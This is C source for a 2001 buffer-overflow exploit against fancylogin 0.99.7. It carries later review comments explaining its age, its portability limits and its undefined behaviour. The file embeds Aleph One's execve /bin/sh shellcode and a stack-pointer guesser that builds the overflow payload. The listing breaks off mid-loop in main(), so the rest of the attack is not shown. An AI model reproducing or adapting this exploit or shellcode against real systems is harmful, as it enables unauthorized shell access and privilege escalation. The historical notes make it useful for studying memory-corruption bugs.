/***********************************************
 * Fancylogin 0.99.7 bufferoverflow exploit
 * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 * Exploited by gh0st
 *
 * There exists a very simple and stupid
 * bug in fancylogin: argv[2] is strcpy'd
 * into a small array without a bounds check.
 * EIP can easily be overwritten; this is
 * standard exploit code...
 * Fancylogin is usually not +s (setuid) so
 * this exploit isn't that dangerous ;)
 *
 * Thx to aleph one for his excellent article
 * about buffer overflows
 *
 * Greetings fly to: huega, koerk, chef,
 * anarchy, bullet
 *
 * This exploit was written during the
 * easterhegg 2001 @ CCC Hamburg
 *
 * usage: fancylogin_ex [buffer_size] [offset]
 *
 * Tested on debian potato and kernel 2.2.18
 * and 2.2.19 using a self-compiled
 * fancylogin 0.99.7.
 * And on rocklinux 1.3.11 with a prebuilt
 * binary of fancylogin.
 *
 * The fancylogin team is aware of this bug
 * and has released a patch.
 *
 * NOTE(review): historical 32-bit x86 Linux
 * exploit (2001). It guesses a stack address
 * (get_sp() - offset) and expects injected
 * code to run from it, so address-space
 * randomisation, non-executable stacks and
 * stack protectors all defeat it on a modern
 * system, and the "movl %esp,%eax" in
 * get_sp() only assembles for i386. No
 * headers are included: printf, malloc and
 * atoi rely on implicit declarations, which
 * C99 removed -- add <stdio.h> and
 * <stdlib.h> to build it today.
 ***********************************************/

// Default distance subtracted from the stack pointer to form the
// guessed return address (worked for the author; overridable via argv[2]).
#define OFFSET 3500
// Default size of the overflow buffer (overridable via argv[1]).
#define BUFFER_SIZE 4100
// Size of the second ("egg") buffer allocated in main().
#define EGG_SIZE 1200

// Standard linux shellcode by aleph one (from the "Smashing the Stack"
// article credited above): 32-bit x86, int 0x80 with eax=0x0b (execve)
// on the embedded "/bin/sh" string, then an exit syscall. The leading
// jmp/pop pair recovers the string address, which is why it contains
// no NUL bytes and survives the strcpy() in the target.
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*
 * Returns the current stack pointer; main() uses it as the base from
 * which the guessed return address is derived.
 *
 * NOTE(review): there is no return statement. The function relies on
 * the asm leaving esp in eax, the i386 return register -- reaching the
 * end of a non-void function and using the result is undefined
 * behaviour, and an optimising compiler may clobber eax before the
 * ret. A well-defined equivalent is an output operand:
 *   unsigned long sp; __asm__ volatile("movl %%esp,%0" : "=r"(sp)); return sp;
 */
unsigned long get_sp(void) {
  __asm__("movl %esp,%eax");
}

/*
 * Entry point: builds the overflow payload for fancylogin.
 *   argv[1] (optional)  overflow buffer size, default BUFFER_SIZE
 *   argv[2] (optional)  offset subtracted from the stack pointer,
 *                       default OFFSET
 * Returns the process exit status (body truncated in this listing,
 * see the note at the end).
 */
int main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=OFFSET, bsize=BUFFER_SIZE;
  int i, eggsize=EGG_SIZE;

  // argv[0] goes through %s, so the format string itself is fixed.
  printf("[ Fancylogin 0.99.7 exploit ]\n[ exploited by gh0st @ easterhegg 2001 ]\n[ usage: %s [size] [offset] ]\n",argv[0]);

  // NOTE(review): atoi() reports no errors -- a non-numeric, zero or
  // negative argv[1] is passed straight to malloc() below (a negative
  // int converts to a huge size_t). strtol() with an explicit range
  // check (bsize > 0) would make the failure visible instead.
  if(argc>1) bsize=atoi(argv[1]);
  if(argc>2) offset=atoi(argv[2]);

  // NOTE(review): neither allocation is checked for NULL before use.
  buff=malloc(bsize);
  egg=malloc(eggsize);
  // Guessed address of the shellcode on the target's stack.
  addr=get_sp()-offset;
  // NOTE(review): addr is a long printed with %x; harmless on the
  // 32-bit targets listed above (long == int) but undefined on LP64 --
  // %lx is the matching conversion.
  printf("+ Using address: 0x%x\n", addr);

  // View the byte buffer as an array of words so it can be filled with
  // the return address one word at a time. malloc() memory is suitably
  // aligned for long, so the cast is safe here.
  ptr=buff;
  addr_ptr=(long *)ptr;
  // NOTE(review): the listing is cut off here; the loop body and the
  // rest of main() (presumably filling buff with addr, placing the
  // shellcode in egg and exec'ing fancylogin, as in Aleph One's
  // template) are not visible in this copy.
  for (i=0;i